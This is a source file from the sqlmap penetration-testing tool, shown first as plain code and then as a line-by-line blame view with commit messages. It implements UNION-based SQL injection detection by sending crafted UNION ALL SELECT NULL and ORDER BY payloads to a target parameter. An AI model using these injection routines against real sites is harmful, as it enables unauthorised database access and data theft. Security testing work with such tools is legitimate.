sqlmap/lib/techniques/inband/union/test.py

#!/usr/bin/env python

"""
$Id$

Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.agent import agent
from lib.core.common import randomStr
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.enums import DBMS
from lib.core.session import setUnion
from lib.core.unescaper import unescaper
from lib.parse.html import htmlParser
from lib.request.connect import Connect as Request

def __unionPosition(negative=False, falseCond=False):
    validPayload = None

    if negative or falseCond:
        negLogMsg = "partial (single entry)"
    else:
        negLogMsg = "full"

    infoMsg  = "confirming %s inband sql injection on parameter " % negLogMsg
    infoMsg += "'%s'" % kb.injParameter

    if negative:
        infoMsg += " with negative parameter value"
    elif falseCond:
        infoMsg += " by appending a false condition after the parameter value"

    logger.info(infoMsg)

    # For each column of the table (# of NULL) perform a request using
    # the UNION ALL SELECT statement to test it the target url is
    # affected by an exploitable inband SQL injection vulnerability
    for exprPosition in range(0, kb.unionCount):
        # Prepare expression with delimiters
        randQuery = randomStr()
        randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
        randQueryUnescaped = unescaper.unescape(randQueryProcessed)

        # Forge the inband SQL injection request
        query   = agent.forgeInbandQuery(randQueryUnescaped, exprPosition)
        payload = agent.payload(newValue=query, negative=negative, falseCond=falseCond)

        # Perform the request
        resultPage, _ = Request.queryPage(payload, content=True)

        if resultPage and randQuery in resultPage:
            setUnion(position=exprPosition)
            validPayload = payload

            break

    if isinstance(kb.unionPosition, int):
        infoMsg  = "the target url is affected by an exploitable "
        infoMsg += "%s inband sql injection vulnerability " % negLogMsg
        infoMsg += "on parameter '%s'" % kb.injParameter
        logger.info(infoMsg)
    else:
        warnMsg  = "the target url is not affected by an exploitable "
        warnMsg += "%s inband sql injection vulnerability " % negLogMsg
        warnMsg += "on parameter '%s'" % kb.injParameter

        if negLogMsg == "partial":
            warnMsg += ", sqlmap will retrieve the query output "
            warnMsg += "through blind sql injection technique"

        logger.warn(warnMsg)

    return validPayload

def __unionConfirm(negative=False, falseCond=False):
    validPayload = None

    # Confirm the inband SQL injection and get the exact column
    # position which can be used to extract data
    if not isinstance(kb.unionPosition, int):
        validPayload = __unionPosition(negative=negative, falseCond=falseCond)

        # Assure that the above function found the exploitable full inband
        # SQL injection position
        if not isinstance(kb.unionPosition, int):
            validPayload = __unionPosition(negative=True)

            # Assure that the above function found the exploitable partial
            # (single entry) inband SQL injection position with negative
            # parameter validPayload
            if not isinstance(kb.unionPosition, int):
                validPayload = __unionPosition(falseCond=True)

                # Assure that the above function found the exploitable partial
                # (single entry) inband SQL injection position by appending
                # a false condition after the parameter validPayload
                if not isinstance(kb.unionPosition, int):
                    return
                else:
                    setUnion(falseCond=True)
            else:
                setUnion(negative=True)

    return validPayload

def __unionTestByNULLBruteforce(comment, negative=False, falseCond=False):
    """
    This method tests if the target url is affected by an inband
    SQL injection vulnerability. The test is done up to 50 columns
    on the target database table
    """

    columns = None
    query   = agent.prefixQuery("UNION ALL SELECT NULL")

    for count in range(0, conf.uCols+1):
        if kb.dbms == DBMS.ORACLE and query.endswith(" FROM DUAL"):
            query = query[:-len(" FROM DUAL")]

        if count:
            query += ", NULL"

        if kb.dbms == DBMS.ORACLE:
            query += " FROM DUAL"

        commentedQuery = agent.postfixQuery(query, comment)
        payload        = agent.payload(newValue=commentedQuery, negative=negative, falseCond=falseCond)
        seqMatcher     = Request.queryPage(payload, getSeqMatcher=True)

        if seqMatcher >= 0.6:
            columns = count + 1

            break

    return columns

def __unionTestByOrderBy(comment, negative=False, falseCond=False):
    columns     = None
    prevPayload = ""

    for count in range(1, conf.uCols+2):
        query        = agent.prefixQuery("ORDER BY %d" % count)
        orderByQuery = agent.postfixQuery(query, comment)
        payload      = agent.payload(newValue=orderByQuery, negative=negative, falseCond=falseCond)
        seqMatcher   = Request.queryPage(payload, getSeqMatcher=True)

        if seqMatcher >= 0.6:
            columns = count

        elif columns:
            break

        prevPayload = payload

    return columns

def __unionTestAll(comment="", negative=False, falseCond=False):
    columns = None

    if conf.uTech == "orderby":
        columns = __unionTestByOrderBy(comment, negative=negative, falseCond=falseCond)
    else:
        columns = __unionTestByNULLBruteforce(comment, negative=negative, falseCond=falseCond)

    return columns

def unionTest():
    """
    This method tests if the target url is affected by an inband
    SQL injection vulnerability. The test is done up to 3*50 times
    """

    if conf.direct:
        return

    if kb.unionTest is not None:
        return kb.unionTest

    if conf.uTech == "orderby":
        technique = "ORDER BY clause bruteforcing"
    else:
        technique = "NULL bruteforcing"

    infoMsg  = "testing inband sql injection on parameter "
    infoMsg += "'%s' with %s technique" % (kb.injParameter, technique)
    logger.info(infoMsg)

    validPayload = None
    columns = None
    negative = False
    falseCond = False

    for comment in (queries[kb.dbms].comment.query, ""):
        columns = __unionTestAll(comment)

        if not columns:
            negative = True
            columns = __unionTestAll(comment, negative=negative)

        if not columns:
            falseCond = True
            columns = __unionTestAll(comment, falseCond=falseCond)

        if columns:
            setUnion(comment=comment, count=columns, negative=negative, falseCond=falseCond)

            break

    if kb.unionCount:
        validPayload = __unionConfirm(negative=negative, falseCond=falseCond)
    else:
        warnMsg  = "the target url is not affected by an "
        warnMsg += "inband sql injection vulnerability"
        logger.warn(warnMsg)

    validPayload = agent.removePayloadDelimiters(validPayload, False)
    setUnion(payload=validPayload)

    return kb.unionTest
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`#!/usr/bin/env python`

			`"""`
propsets.. 2008-10-15 19:56:32 +04:00			$Id$
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
large commit with copyright header modifications 2010-10-14 18:41:14 +04:00			`Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)`
sorry, cosmetics 2010-10-15 03:18:29 +04:00			`See the file 'doc/COPYING' for copying permission`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`"""`

			`from lib.core.agent import agent`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`from lib.core.common import randomStr`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`from lib.core.data import conf`
			`from lib.core.data import kb`
			`from lib.core.data import logger`
Minor improvement when testing for UNION query SQL injection to check only without comment and with DBMS specific comment (not anymore "random" unspecific comment characters) 2008-12-02 02:09:07 +03:00			`from lib.core.data import queries`
further refactoring (all enumerations are now put into enums.py) 2010-11-08 12:20:02 +03:00			`from lib.core.enums import DBMS`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`from lib.core.session import setUnion`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`from lib.core.unescaper import unescaper`
			`from lib.parse.html import htmlParser`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`from lib.request.connect import Connect as Request`

Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`def __unionPosition(negative=False, falseCond=False):`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`validPayload = None`
fixes #181 - proper save/resume information about single entry UNION SQL injection 2010-03-22 18:39:29 +03:00
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`if negative or falseCond:`
			`negLogMsg = "partial (single entry)"`
			`else:`
			`negLogMsg = "full"`

			`infoMsg = "confirming %s inband sql injection on parameter " % negLogMsg`
			`infoMsg += "'%s'" % kb.injParameter`

			`if negative:`
			`infoMsg += " with negative parameter value"`
			`elif falseCond:`
			`infoMsg += " by appending a false condition after the parameter value"`

			`logger.info(infoMsg)`

			`# For each column of the table (# of NULL) perform a request using`
			`# the UNION ALL SELECT statement to test it the target url is`
			`# affected by an exploitable inband SQL injection vulnerability`
			`for exprPosition in range(0, kb.unionCount):`
			`# Prepare expression with delimiters`
			`randQuery = randomStr()`
			`randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)`
			`randQueryUnescaped = unescaper.unescape(randQueryProcessed)`

			`# Forge the inband SQL injection request`
			`query = agent.forgeInbandQuery(randQueryUnescaped, exprPosition)`
			`payload = agent.payload(newValue=query, negative=negative, falseCond=falseCond)`

			`# Perform the request`
			`resultPage, _ = Request.queryPage(payload, content=True)`

Another bug fix for --union-test 2010-11-14 18:39:57 +03:00			`if resultPage and randQuery in resultPage:`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`setUnion(position=exprPosition)`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`validPayload = payload`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`break`

			`if isinstance(kb.unionPosition, int):`
			`infoMsg = "the target url is affected by an exploitable "`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`infoMsg += "%s inband sql injection vulnerability " % negLogMsg`
			`infoMsg += "on parameter '%s'" % kb.injParameter`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`logger.info(infoMsg)`
			`else:`
			`warnMsg = "the target url is not affected by an exploitable "`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`warnMsg += "%s inband sql injection vulnerability " % negLogMsg`
			`warnMsg += "on parameter '%s'" % kb.injParameter`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`if negLogMsg == "partial":`
			`warnMsg += ", sqlmap will retrieve the query output "`
			`warnMsg += "through blind sql injection technique"`

			`logger.warn(warnMsg)`

Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`return validPayload`
fixes #181 - proper save/resume information about single entry UNION SQL injection 2010-03-22 18:39:29 +03:00
Major enhancement to --union-test check 2010-11-14 01:47:37 +03:00			`def __unionConfirm(negative=False, falseCond=False):`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`validPayload = None`
fixes #181 - proper save/resume information about single entry UNION SQL injection 2010-03-22 18:39:29 +03:00
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`# Confirm the inband SQL injection and get the exact column`
Major enhancement to --union-test check 2010-11-14 01:47:37 +03:00			`# position which can be used to extract data`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`if not isinstance(kb.unionPosition, int):`
Major enhancement to --union-test check 2010-11-14 01:47:37 +03:00			`validPayload = __unionPosition(negative=negative, falseCond=falseCond)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`# Assure that the above function found the exploitable full inband`
			`# SQL injection position`
			`if not isinstance(kb.unionPosition, int):`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`validPayload = __unionPosition(negative=True)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`# Assure that the above function found the exploitable partial`
Major bug fix to --union-test 2010-10-26 03:39:55 +04:00			`# (single entry) inband SQL injection position with negative`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`# parameter validPayload`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`if not isinstance(kb.unionPosition, int):`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`validPayload = __unionPosition(falseCond=True)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`# Assure that the above function found the exploitable partial`
Major bug fix to --union-test 2010-10-26 03:39:55 +04:00			`# (single entry) inband SQL injection position by appending`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`# a false condition after the parameter validPayload`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`if not isinstance(kb.unionPosition, int):`
			`return`
			`else:`
Major bug fix to --union-test 2010-10-26 03:39:55 +04:00			`setUnion(falseCond=True)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`else:`
Major bug fix to --union-test 2010-10-26 03:39:55 +04:00			`setUnion(negative=True)`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`return validPayload`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00
Major enhancement to --union-test check 2010-11-14 01:47:37 +03:00			`def __unionTestByNULLBruteforce(comment, negative=False, falseCond=False):`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`"""`
			`This method tests if the target url is affected by an inband`
			`SQL injection vulnerability. The test is done up to 50 columns`
			`on the target database table`
			`"""`

Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00			`columns = None`
Minor code adjustments 2010-10-25 18:11:47 +04:00			`query = agent.prefixQuery("UNION ALL SELECT NULL")`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Added --union-cols switch to specify the max number of columns to test for UNION query sql injection. Now stores/resumes also the exact UNION payload to session file. 2010-11-14 02:24:41 +03:00			`for count in range(0, conf.uCols+1):`
refactoring of hard coded dbms names 2010-11-02 14:59:24 +03:00			`if kb.dbms == DBMS.ORACLE and query.endswith(" FROM DUAL"):`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`query = query[:-len(" FROM DUAL")]`

			`if count:`
			`query += ", NULL"`

refactoring of hard coded dbms names 2010-11-02 14:59:24 +03:00			`if kb.dbms == DBMS.ORACLE:`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`query += " FROM DUAL"`

			`commentedQuery = agent.postfixQuery(query, comment)`
Major enhancement to --union-test check 2010-11-14 01:47:37 +03:00			`payload = agent.payload(newValue=commentedQuery, negative=negative, falseCond=falseCond)`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00			`seqMatcher = Request.queryPage(payload, getSeqMatcher=True)`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00			`if seqMatcher >= 0.6:`
			`columns = count + 1`

			`break`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
fixes #181 - proper save/resume information about single entry UNION SQL injection 2010-03-22 18:39:29 +03:00			`return columns`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Major enhancement to --union-test check 2010-11-14 01:47:37 +03:00			`def __unionTestByOrderBy(comment, negative=False, falseCond=False):`
Minor bug fixes to --os-shell (altought web backdoor functionality still to be reviewed). Minor common library code refactoring. Code cleanup. Set back the default User-Agent to sqlmap for comparison algorithm reasons. Updated THANKS. 2009-04-28 03:05:11 +04:00			`columns = None`
			`prevPayload = ""`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00
Added --union-cols switch to specify the max number of columns to test for UNION query sql injection. Now stores/resumes also the exact UNION payload to session file. 2010-11-14 02:24:41 +03:00			`for count in range(1, conf.uCols+2):`
Minor code adjustments 2010-10-25 18:11:47 +04:00			`query = agent.prefixQuery("ORDER BY %d" % count)`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00			`orderByQuery = agent.postfixQuery(query, comment)`
Major enhancement to --union-test check 2010-11-14 01:47:37 +03:00			`payload = agent.payload(newValue=orderByQuery, negative=negative, falseCond=falseCond)`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00			`seqMatcher = Request.queryPage(payload, getSeqMatcher=True)`

			`if seqMatcher >= 0.6:`
			`columns = count`
Minor layout adjustments to --union-tech 2008-12-29 21:48:23 +03:00
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00			`elif columns:`
			`break`

			`prevPayload = payload`

fixes #181 - proper save/resume information about single entry UNION SQL injection 2010-03-22 18:39:29 +03:00			`return columns`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Major enhancement to --union-test check 2010-11-14 01:47:37 +03:00			`def __unionTestAll(comment="", negative=False, falseCond=False):`
			`columns = None`

			`if conf.uTech == "orderby":`
			`columns = __unionTestByOrderBy(comment, negative=negative, falseCond=falseCond)`
			`else:`
			`columns = __unionTestByNULLBruteforce(comment, negative=negative, falseCond=falseCond)`

			`return columns`

After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`def unionTest():`
			`"""`
			`This method tests if the target url is affected by an inband`
			`SQL injection vulnerability. The test is done up to 3*50 times`
			`"""`

Major enhancement to directly connect to the dbms without passing via a sql injection: adapted code accordingly - see #158. This feature relies on python third-party libraries to be able to connect to the database. For the moment it has been implemented for MySQL (with python-mysqldb module) and PostgreSQL (with python-psycopg2 module). Minor layout adjustments. 2010-03-27 02:23:25 +03:00			`if conf.direct:`
			`return`

Consistency between --*-test switches/output 2010-11-08 19:46:25 +03:00			`if kb.unionTest is not None:`
			`return kb.unionTest`
Minor bug fix to correctly resuming --union-test results from session file. 2010-05-19 18:21:59 +04:00
Minor layout adjustments to --union-tech 2008-12-29 21:48:23 +03:00			`if conf.uTech == "orderby":`
			`technique = "ORDER BY clause bruteforcing"`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00			`else:`
			`technique = "NULL bruteforcing"`

Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`infoMsg = "testing inband sql injection on parameter "`
Minor adjustments 2010-01-15 20:42:46 +03:00			`infoMsg += "'%s' with %s technique" % (kb.injParameter, technique)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`logger.info(infoMsg)`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`validPayload = None`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00			`columns = None`
Major enhancement to --union-test check 2010-11-14 01:47:37 +03:00			`negative = False`
			`falseCond = False`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
removed queriesfile.py, implemented XMLObject approach (still shell.py and udf.py TODO) 2010-10-21 17:13:12 +04:00			`for comment in (queries[kb.dbms].comment.query, ""):`
Major enhancement to --union-test check 2010-11-14 01:47:37 +03:00			`columns = __unionTestAll(comment)`

			`if not columns:`
			`negative = True`
			`columns = __unionTestAll(comment, negative=negative)`

			`if not columns:`
			`falseCond = True`
			`columns = __unionTestAll(comment, falseCond=falseCond)`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00
			`if columns:`
Major enhancement to --union-test check 2010-11-14 01:47:37 +03:00			`setUnion(comment=comment, count=columns, negative=negative, falseCond=falseCond)`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
			`break`

			`if kb.unionCount:`
Major enhancement to --union-test check 2010-11-14 01:47:37 +03:00			`validPayload = __unionConfirm(negative=negative, falseCond=falseCond)`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`else:`
			`warnMsg = "the target url is not affected by an "`
			`warnMsg += "inband sql injection vulnerability"`
			`logger.warn(warnMsg)`

Added --union-cols switch to specify the max number of columns to test for UNION query sql injection. Now stores/resumes also the exact UNION payload to session file. 2010-11-14 02:24:41 +03:00			`validPayload = agent.removePayloadDelimiters(validPayload, False)`
			`setUnion(payload=validPayload)`
fixes #181 - proper save/resume information about single entry UNION SQL injection 2010-03-22 18:39:29 +03:00
Consistency between --*-test switches/output 2010-11-08 19:46:25 +03:00			`return kb.unionTest`